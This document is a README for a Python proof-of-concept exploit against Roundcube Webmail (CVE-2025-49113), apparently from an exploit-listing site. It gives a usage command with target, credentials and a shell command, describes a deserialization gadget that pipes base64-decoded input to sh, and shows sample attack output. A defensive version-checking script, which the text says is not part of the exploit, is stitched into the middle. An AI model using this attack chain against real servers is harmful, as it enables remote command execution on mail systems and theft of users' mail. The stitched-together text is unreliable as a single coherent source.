## https://sploitus.com/exploit?id=B86DD116-6D0F-516E-9915-1248AAC19FB8
# CVE-2025-49113: Roundcube Webmail RCE Exploit (Python PoC)
> **CVE ID:** CVE-2025-49113
> **Exploit Type:** Remote Code Execution (via PHP Object Injection)
> **Application:** Roundcube Webmail ≤ 1.5.9 and ≤ 1.6.10
> **Exploit Language:** Python
> **Author:** 00xCanelo
> **Status:** Tested and Working on Vulnerable Roundcube Installations
---
## Description
This exploit leverages a vulnerability in how Roundcube Webmail handles uploaded image filenames, which are unserialized as PHP objects. By crafting a payload that triggers a `Crypt_GPG_Engine` deserialization chain, remote command execution is achieved **post-authentication**.
This Python PoC mirrors the attack chain of the public PHP exploit, with cleaner logic, optional logging, and simpler integration into offensive tooling setups.
---
## Prerequisites
- Vulnerable Roundcube version (≤ 1.5.9 or ≤ 1.6.10)
- Valid user credentials on Roundcube
- Python 3.x environment
- `pip install requests`
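A defensive counterpart, added here and not part of the PoC: a small Python check that classifies a Roundcube version (a dotted string, or the integer form the script prints, e.g. `10606`) against the affected ranges listed above, so an inventory can be triaged for upgrades. It assumes the integer form is `major*10000 + minor*100 + patch`, which matches `10606` for 1.6.6 in the sample output; the host names are constructed.

```python
# Added example (not part of the PoC): decide whether a Roundcube version
# falls inside the ranges named in this README: <= 1.5.9, or 1.6.0 .. 1.6.10.
# Assumption: the integer form is major*10000 + minor*100 + patch, which is
# consistent with 10606 corresponding to 1.6.6 in the sample output.
from __future__ import annotations

import re

def parse_version(value: str | int) -> tuple[int, int, int]:
    """Return (major, minor, patch) from '1.6.6', '1.6.6-rc1' or 10606."""
    text = str(value).strip()
    if text.isdigit():
        n = int(text)
        return n // 10000, (n // 100) % 100, n % 100
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised Roundcube version: {value!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)

def is_affected(value: str | int) -> bool:
    """True when the version lies inside the affected ranges quoted above."""
    v = parse_version(value)
    # Tuple comparison gives correct ordering for 1.6.9 < 1.6.10 < 1.6.11.
    return v <= (1, 5, 9) or (1, 6, 0) <= v <= (1, 6, 10)

def hosts_to_patch(inventory: dict[str, str | int]) -> list[str]:
    """Sorted names of hosts whose recorded Roundcube version is affected."""
    return sorted(host for host, ver in inventory.items() if is_affected(ver))

# Constructed sample inventory (placeholder hosts, not real systems).
SAMPLE_INVENTORY = {
    "mail-a.example.test": "1.6.10",   # last affected 1.6.x release
    "mail-b.example.test": "1.6.11",   # first fixed 1.6.x release
    "mail-c.example.test": 10509,      # integer form of 1.5.9, affected
    "mail-d.example.test": "1.5.10",   # first fixed 1.5.x release
}

if __name__ == "__main__":
    for host in hosts_to_patch(SAMPLE_INVENTORY):
        print(f"{host}: Roundcube {SAMPLE_INVENTORY[host]} is within the affected range")
```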
---
## Exploitation Steps
```bash
python3 CVE-2025-49113.py
```
### Example:
```bash
python3 CVE-2025-49113.py https://mail.target.htb/ user@target.htb 'P@ssw0rd123' 'id'
```
---
## Vulnerable Chain
The PHP class `Crypt_GPG_Engine` exposes a `_gpgconf` field whose value is passed to shell execution.
Our payload places:
```sh
echo "" | base64 -d | sh
```
in `_gpgconf`, so the command runs when the object is deserialized, yielding RCE.
---
## Sample Output
```
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!
```
---
## File Structure
```
.
├── CVE-2025-49113.py   # Python PoC script
└── README.md           # This documentation
```
---
## Disclaimer
This code is for **educational and authorized security testing** purposes only. Any misuse of this tool is strictly prohibited. The author is not responsible for any damages caused.
---
## References
- https://nvd.nist.gov/vuln/detail/CVE-2025-49113
- https://github.com/roundcube/roundcubemail/issues/9312
- https://huntr.dev/bounties/f8e2a8e6-d1d7-44e1-93e1-367861c97a82/